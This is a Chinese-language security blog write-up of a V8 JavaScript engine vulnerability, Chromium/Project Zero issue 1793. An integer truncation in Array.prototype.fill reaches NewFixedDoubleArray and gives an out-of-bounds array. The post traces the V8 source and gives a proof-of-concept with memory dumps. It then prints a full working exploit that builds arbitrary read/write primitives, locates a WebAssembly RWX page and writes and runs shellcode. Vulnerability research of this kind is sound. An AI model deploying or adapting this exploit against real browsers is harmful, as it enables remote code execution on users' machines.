Chrome-issue-1793分析

字数统计: 2.8k字   |   阅读时长≈ 14分

刚开始入门v8,看到这个issue好像难度不是很大,所以就仔细研究一下,算是研究的第一个v8漏洞了

漏洞分析

v8/src/heap/factory.cc文件的NewFixedDoubleArray函数中可以发现开发人员对length进行了长度的检查,即DCHECK_LE(0, length)。但由于DCHECK只在debug中起作用,而在release中并不起作用,则该检查对正式版本并没有什么作用。如果length为负数,则会绕过if(length > FixedDoubleArray::kMaxLength)的检查,而由于int size=FixedDoubleArray::SizeFor(length)会使用length计算出size,如果我们合理控制length,则可以让size计算出来为正数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// v8/src/heap/factory.cc
Handle<FixedArrayBase> Factory::NewFixedDoubleArray(int length,PretenureFlag pretenure) {
  DCHECK_LE(0, length); // ***here***
  if (length == 0) return empty_fixed_array();
  //负数绕过检查
  if (length > FixedDoubleArray::kMaxLength) { 
    isolate()->heap()->FatalProcessOutOfMemory("invalid array length");
  }
  //计算出一个正数
  int size = FixedDoubleArray::SizeFor(length); // ***here***
  Map map = *fixed_double_array_map();
  //申请elements空间
  HeapObject result =
    AllocateRawWithImmortalMap(size, pretenure, map, kDoubleAligned);
  Handle<FixedDoubleArray> array(FixedDoubleArray::cast(result), isolate());
  array->set_length(length);
  return array;
}

// Garbage collection support.
inline static int SizeFor(int length) {
  return kHeaderSize + length * kDoubleSize;
}

漏洞点就在于NewFixedDoubleArray函数传入了一个负数的length,可以绕过检查;然后在sizeFor函数中,使得计算出的size为一个正数,那么就会申请一个正数的elements空间。那么最终就会使得这个数组对象,element空间是正常的,但是length是一个极大的负数,也就是造成了这个数组对象可以越界。

漏洞触发

接下来就分析这个漏洞的触发路径。

这里在v8/src/builtins/builtins-array.cc文件中的ArrayPrototypeFill函数可以调用触发NewFixedDoubleArray函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
BUILTIN(ArrayPrototypeFill) {
  HandleScope scope(isolate);
	
  if (isolate->debug_execution_mode() == DebugInfo::kSideEffects) {
    if (!isolate->debug()->PerformSideEffectCheckForObject(args.receiver())) {
      return ReadOnlyRoots(isolate).exception();
    }
  }

  // 1. Let O be ? ToObject(this value).
  //获取对象,返回值为receiver
  Handle<JSReceiver> receiver;
  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, receiver, Object::ToObject(isolate, args.receiver()));

  // 2. Let len be ? ToLength(? Get(O, "length")).
  //获取对象长度,返回值length
  double length;
  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, length, GetLengthProperty(isolate, receiver));

  // 3. Let relativeStart be ? ToInteger(start).
  // 4. If relativeStart < 0, let k be max((len + relativeStart), 0);
  //    else let k be min(relativeStart, len).
  //获取开始长度start
  Handle<Object> start = args.atOrUndefined(isolate, 2);

  double start_index;
  //获取Start处的值start_index
  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, start_index, GetRelativeIndex(isolate, length, start, 0));

  // 5. If end is undefined, let relativeEnd be len;
  //    else let relativeEnd be ? ToInteger(end).
  // 6. If relativeEnd < 0, let final be max((len + relativeEnd), 0);
  //    else let final be min(relativeEnd, len).
  Handle<Object> end = args.atOrUndefined(isolate, 3);

  double end_index;
  //获取end处的值end_index
  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, end_index, GetRelativeIndex(isolate, length, end, length));

  if (start_index >= end_index) return *receiver;

  // Ensure indexes are within array bounds
  DCHECK_LE(0, start_index);
  DCHECK_LE(start_index, end_index);
  DCHECK_LE(end_index, length);

  Handle<Object> value = args.atOrUndefined(isolate, 1);
	//调用TryFastArrayFill,start_index和end_index都是double类型
  if (TryFastArrayFill(isolate, &args, receiver, value, start_index,
                       end_index)) {
    return *receiver;
  }
  return GenericArrayFill(isolate, receiver, value, start_index, end_index);
}

上述函数,有几个需要关注的点。

首先是调用了GetRelativeIndex函数,来分别获取startend处的值。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// If |index| is Undefined, returns init_if_undefined.
// If |index| is negative, returns length + index.
// If |index| is positive, returns index.
// Returned value is guaranteed to be in the interval of [0, length].
V8_WARN_UNUSED_RESULT Maybe<double> GetRelativeIndex(Isolate* isolate,
                                                     double length,
                                                     Handle<Object> index,
                                                     double init_if_undefined) {
  double relative_index = init_if_undefined;
  if (!index->IsUndefined()) {
    Handle<Object> relative_index_obj;
    //ToInteger函数会触发自定义函数
    ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, relative_index_obj,
                                     Object::ToInteger(isolate, index),
                                     Nothing<double>());
    relative_index = relative_index_obj->Number();
  }

  if (relative_index < 0) {
    return Just(std::max(length + relative_index, 0.0));
  }

  return Just(std::min(relative_index, length));
}

GetRelativeIndex函数中,可以看到调用了Object::ToInteger函数。该函数与我之前调试的2019数字经济Browser题目中的Object::ToNumber函数类似,都是可以去调用用户自定义函数。调用链如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
// static
MaybeHandle<Object> Object::ToInteger(Isolate* isolate, Handle<Object> input) {
  if (input->IsSmi()) return input;
  return ConvertToInteger(isolate, input);	
}

// static
MaybeHandle<Object> Object::ConvertToInteger(Isolate* isolate,
                                             Handle<Object> input) {
  ASSIGN_RETURN_ON_EXCEPTION(
      isolate, input,
      ConvertToNumberOrNumeric(isolate, input, Conversion::kToNumber), Object);
  if (input->IsSmi()) return input;
  return isolate->factory()->NewNumber(DoubleToInteger(input->Number()));
}

// static
MaybeHandle<Object> Object::ConvertToNumberOrNumeric(Isolate* isolate,
                                                     Handle<Object> input,
                                                     Conversion mode) {
  while (true) {
    if (input->IsNumber()) {
      return input;
    }
    if (input->IsString()) {
      return String::ToNumber(isolate, Handle<String>::cast(input));
    }
    if (input->IsOddball()) {
      return Oddball::ToNumber(isolate, Handle<Oddball>::cast(input));
    }
    if (input->IsSymbol()) {
      THROW_NEW_ERROR(isolate, NewTypeError(MessageTemplate::kSymbolToNumber),
                      Object);
    }
    if (input->IsBigInt()) {
      if (mode == Conversion::kToNumeric) return input;
      DCHECK_EQ(mode, Conversion::kToNumber);
      THROW_NEW_ERROR(isolate, NewTypeError(MessageTemplate::kBigIntToNumber),
                      Object);
    }
    //如果input不是Number、String、Oddball和BigInt类型,则进入ToPrimitive
    ASSIGN_RETURN_ON_EXCEPTION(
        isolate, input, JSReceiver::ToPrimitive(Handle<JSReceiver>::cast(input),
                                                ToPrimitiveHint::kNumber),
        Object);
  }
}

// static
MaybeHandle<Object> JSReceiver::ToPrimitive(Handle<JSReceiver> receiver,
                                            ToPrimitiveHint hint) {
  Isolate* const isolate = receiver->GetIsolate();
  Handle<Object> exotic_to_prim;
  //获取自定义函数到exotic_to_prim
  ASSIGN_RETURN_ON_EXCEPTION(
      isolate, exotic_to_prim,
      GetMethod(receiver, isolate->factory()->to_primitive_symbol()), Object);
  if (!exotic_to_prim->IsUndefined(isolate)) {
    Handle<Object> hint_string =
        isolate->factory()->ToPrimitiveHintString(hint);
    Handle<Object> result;
    //Call函数调用自定义函数,修改length
    ASSIGN_RETURN_ON_EXCEPTION(
        isolate, result,
        Execution::Call(isolate, exotic_to_prim, receiver, 1, &hint_string),
        Object);
    if (result->IsPrimitive()) return result;
    THROW_NEW_ERROR(isolate,
                    NewTypeError(MessageTemplate::kCannotConvertToPrimitive),
                    Object);
  }
  return OrdinaryToPrimitive(receiver, (hint == ToPrimitiveHint::kString)
                                           ? OrdinaryToPrimitiveHint::kString
                                           : OrdinaryToPrimitiveHint::kNumber);
}

其次是调用了TryFastArrayFill,其中的accessor->Fill函数会调用Object FillImpl,在调用之前需要注意传入的参数endstart32位无符号数,而其又是由double类型的start_indexend_index两个数转换过来。所以这里就存在一个64位到32位是的截断,导致大小出现变化。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
V8_WARN_UNUSED_RESULT bool TryFastArrayFill(
    Isolate* isolate, BuiltinArguments* args, Handle<JSReceiver> receiver,
    Handle<Object> value, double start_index, double end_index) {
  // If indices are too large, use generic path since they are stored as
  // properties, not in the element backing store.
  if (end_index > kMaxUInt32) return false;
  
  ...

  uint32_t start, end;
  CHECK(DoubleToUint32IfEqualToSelf(start_index, &start));
  CHECK(DoubleToUint32IfEqualToSelf(end_index, &end));

  ElementsAccessor* accessor = array->GetElementsAccessor();
  accessor->Fill(array, value, start, end);
  return true;
}

Object* FillImpl函数中如果end大于原数组的capacity,则会调用GrowCapacityAndConvertImpl函数来对数组进行扩容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static Object* FillImpl(Handle<JSObject> receiver, Handle<Object> obj_value,
                        uint32_t start, uint32_t end) {
  // Ensure indexes are within array bounds
  DCHECK_LE(0, start);
  DCHECK_LE(start, end);

  // Make sure COW arrays are copied.
  if (IsSmiOrObjectElementsKind(Subclass::kind())) {
    JSObject::EnsureWritableFastElements(receiver);
  }

  // Make sure we have enough space.
  uint32_t capacity =
    Subclass::GetCapacityImpl(*receiver, receiver->elements());
  if (end > capacity) {
    //对数组进行扩容
    Subclass::GrowCapacityAndConvertImpl(receiver, end);
    CHECK_EQ(Subclass::kind(), receiver->GetElementsKind());
  }
  DCHECK_LE(end, Subclass::GetCapacityImpl(*receiver, receiver->elements()));

  for (uint32_t index = start; index < end; ++index) {
    Subclass::SetImpl(receiver, index, *obj_value);
  }
  return *receiver;
}

最终其会调用漏洞函数NewFixedDoubleArray,调用链如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
  static void GrowCapacityAndConvertImpl(Handle<JSObject> object,
                                         uint32_t capacity) {
    Isolate* isolate = object->GetIsolate();
    Handle<SloppyArgumentsElements> elements(
        SloppyArgumentsElements::cast(object->elements()), isolate);
    Handle<FixedArray> old_arguments(FixedArray::cast(elements->arguments()),
                                     isolate);
    ElementsKind from_kind = object->GetElementsKind();
    // This method should only be called if there's a reason to update the
    // elements.
    DCHECK(from_kind == SLOW_SLOPPY_ARGUMENTS_ELEMENTS ||
           static_cast<uint32_t>(old_arguments->length()) < capacity);
    //调用ConvertElementWithCapacity将成员转入新数组
    Handle<FixedArrayBase> arguments =
        ConvertElementsWithCapacity(object, old_arguments, from_kind, capacity);
    Handle<Map> new_map = JSObject::GetElementsTransitionMap(
        object, FAST_SLOPPY_ARGUMENTS_ELEMENTS);
    JSObject::MigrateToMap(object, new_map);
    elements->set_arguments(FixedArray::cast(*arguments));
    JSObject::ValidateElements(*object);
  }
};

  static Handle<FixedArrayBase> ConvertElementsWithCapacity(
      Handle<JSObject> object, Handle<FixedArrayBase> old_elements,
      ElementsKind from_kind, uint32_t capacity, uint32_t src_index,
      uint32_t dst_index, int copy_size) {
    Isolate* isolate = object->GetIsolate();
    Handle<FixedArrayBase> new_elements;
    if (IsDoubleElementsKind(kind())) {
      //调用漏洞函数NewFixedDoubleArray,传入的参数capacity是一个32位无符号数
      new_elements = isolate->factory()->NewFixedDoubleArray(capacity);
    } else {
      new_elements = isolate->factory()->NewUninitializedFixedArray(capacity);
    }

    int packed_size = kPackedSizeNotKnown;
    if (IsFastPackedElementsKind(from_kind) && object->IsJSArray()) {
      packed_size = Smi::ToInt(JSArray::cast(*object)->length());
    }

    Subclass::CopyElementsImpl(isolate, *old_elements, src_index, *new_elements,
                               from_kind, dst_index, packed_size, copy_size);

    return new_elements;
  }

漏洞点总结

上面大概讲了一下漏洞的触发路径,现在我们全面总结一下漏洞点:

1、 在 ArrayPrototypeFill函数中,会调用GetRelativeIndex函数来获取数组的边界;

2、 在GetRelativeIndex函数中,可以最终调用我们的自定义函数,来修改数组的大小;

3、 当数组的大小被修改后,就使得当前数组的长度与原长度不匹配,所以会调用TryFastArrayFill来尝试填充数组,传入的参数数组的边界start_indexend_index都是double类型

4、 在TryFastArrayFill,会调用Object* FillImpl来填充原数组,传入的参数uint32类型的startend由原来的double类型start_indexend_index转变而来;

5、 在Object* FillImpl发现现有数组边界end大于原数组大小capacity时,会调用GrowCapacityAndConvertImpl函数来扩容数组;

6、 最终经过多次调用会进入漏洞函数NewFixedDoubleArray去创建新数组,传入的参数为uint32end

7、 在NewFixedDoubleArray会将传入的参数uint32 end转换为int length,将无符号数转换为了整数int类型,那么则能触发漏洞。

如果我们在第2步中,将数组大小修改为一个0x80000000;那么经过第4步转换时,此时end=0x80000000;经过传递进入第7步时,length=0x80000000,由于length是一个int类型,则变成了一个负数,刚好可以绕过前面的检查。随后让计算出来的size=8,那么就会申请element空间为8,但是length=0x80000000,则可以数组越界。

漏洞利用

漏洞触发POC如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
array = [];
array.length = 0xffffffff;
arr = array.fill(1.1, 0x80000000 - 1, {valueOf() {
  array.length = 0x100;
  array.fill(1.1);
  return 0x80000000;
}});

let a = new Array(0x12345678,0); 
let ab = new ArrayBuffer(8); 
%DebugPrint(array);
%DebugPrint(a);
%DebugPrint(ab);
%SystemBreak();

当执行了上面的POC后,内存布局如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
//arrary
pwndbg> tel 0x3a61ccd0dbe0
00:00000x3a61ccd0dbe0 —▸ 0x20adbc60a9a9 ◂— 0x4000031f6c6e001
01:00080x3a61ccd0dbe8 —▸ 0x31f6c6e00c21 ◂— 0x31f6c6e007
02:00100x3a61ccd0dbf0 —▸ 0x3a61ccd0f1e9 ◂— 0x9a000031f6c6e014	//elements
03:00180x3a61ccd0dbf8 ◂— 0x10000000000			//length=0x100
04:00200x3a61ccd0dc00 —▸ 0x31f6c6e01c79 ◂— 0x31f6c6e001	
05:00280x3a61ccd0dc08 ◂— 0x400000000
06:00300x3a61ccd0dc10 ◂— 0x200000000
07:00380x3a61ccd0dc18 ◂— 0x0
//a
pwndbg> tel 0x3a61ccd0f1f8
00:00000x3a61ccd0f1f8 —▸ 0x20adbc602d99 ◂— 0x4000031f6c6e001
01:00080x3a61ccd0f200 —▸ 0x31f6c6e00c21 ◂— 0x31f6c6e007
02:00100x3a61ccd0f208 —▸ 0x3a61ccd0f229 ◂— 0x31f6c6e007	//elements
03:00180x3a61ccd0f210 ◂— 0x200000000				//length=0x2
04:00200x3a61ccd0f218 —▸ 0x31f6c6e05249 ◂— 0x2000031f6c6e001
05:00280x3a61ccd0f220 —▸ 0xdf73aba13f1 ◂— 0x31f6c6e05a
06:00300x3a61ccd0f228 —▸ 0x31f6c6e007b1 ◂— 0x31f6c6e001
07:00380x3a61ccd0f230 ◂— 0x200000000
//ab
pwndbg> tel 0x3a61ccd0f248
00:00000x3a61ccd0f248 —▸ 0x20adbc6021b9 ◂— 0x8000031f6c6e001
01:00080x3a61ccd0f250 —▸ 0x31f6c6e00c21 ◂— 0x31f6c6e007
02:00100x3a61ccd0f258 —▸ 0x31f6c6e00c21 ◂— 0x31f6c6e007	//elements
03:00180x3a61ccd0f260 ◂— 0x8							//length=0x8
04:00200x3a61ccd0f268 —▸ 0x55ff84854190 ◂— 0x0
05:00280x3a61ccd0f270 ◂— 0x2
06:00300x3a61ccd0f278 ◂— 0x0
07:00380x3a61ccd0f280 ◂— 0x0

//array->elements
pwndbg> x/20xg 0x3a61ccd0f1e8
0x3a61ccd0f1e8:	0x000031f6c6e01459	0x3ff199999999999a    //array->element's length 为一个大整数
0x3a61ccd0f1f8:	0x000020adbc602d99	0x000031f6c6e00c21		//object a
0x3a61ccd0f208:	0x00003a61ccd0f229	0x0000000200000000		
0x3a61ccd0f218:	0x000031f6c6e05249	0x00000df73aba13f1
0x3a61ccd0f228:	0x000031f6c6e007b1	0x0000000200000000		//a's element
0x3a61ccd0f238:	0x1234567800000000	0x0000000000000000
0x3a61ccd0f248:	0x000020adbc6021b9	0x000031f6c6e00c21		//obejct ab
0x3a61ccd0f258:	0x000031f6c6e00c21	0x0000000000000008		//ab's backing_store
0x3a61ccd0f268:	0x000055ff84854190	0x0000000000000002
0x3a61ccd0f278:	0x0000000000000000	0x0000000000000000

从上图中可以看到,触发漏洞后arrayelementslength为一个巨大的数值,而申请的elements空间却为0。并且由于arrary.length=0x100,所以存在一个数组越界。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
var buf =new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
function hex(i)
{
  return i.toString(16).padStart(16, "0");
}
// 浮点数转换为64位无符号整数
function f2i(f)
{
  float64[0] = f;
  return bigUint64[0];
}
// 64位无符号整数转为浮点数
function i2f(i)
{
  bigUint64[0] = i;
  return float64[0];
}

array = [];
array.length = 0xffffffff;
arr = array.fill(1.1, 0x80000000 - 1, {valueOf() {
  array.length = 0x100;
  array.fill(1.1);
  return 0x80000000;
}});

let a = new Array(0x12345678,0); 
let ab = new ArrayBuffer(8); 

let idx = arr.indexOf(i2f(0x1234567800000000n));
function addressOf(obj){
  a[0] = obj;
  return f2i(arr[idx]);
}

let back_store_idx = arr.indexOf(i2f(8n))+1;
function arb_read(addr){
  arr[back_store_idx] = i2f(addr);
  let ab1 = new DataView(ab);
  return f2i(ab1.getFloat64(0, true));
}

function arb_write(addr, data){
  arr[back_store_idx] = i2f(addr);
  let ab2 = new DataView(ab);
  ab2.setBigUint64(0, data, true);
}
console.log("[+]idx: " + hex(idx));
console.log("[+]bidx: " + hex(back_store_idx));

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
var instance_addr = addressOf(wasmInstance) - 1n;
console.log("[+]leak wasm instance addr: " + hex(instance_addr));
var rwx_page_addr = arb_read(instance_addr+0x108n);
console.log("[+]leak wasm instance addr: " + hex(instance_addr));
console.log("[+]leak rwx_page_addr: " + hex(rwx_page_addr));

sc = [
    0x91969dd1bb48c031n,
    0x53dbf748ff978cd0n,
    0xb05e545752995f54n,
    0x50f3bn
];

var data_buf = new ArrayBuffer(32);
var data_view = new DataView(data_buf);
var buf_backing_store_addr = addressOf(data_buf) - 1n + 0x20n;
arb_write(buf_backing_store_addr, rwx_page_addr);
for (var i = 0; i < sc.length; i++)
    data_view.setBigUint64(8*i, sc[i], true);

f();

参考文献

Chrome issue-1793分析

https://bugs.chromium.org/p/project-zero/issues/detail?id=1793

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing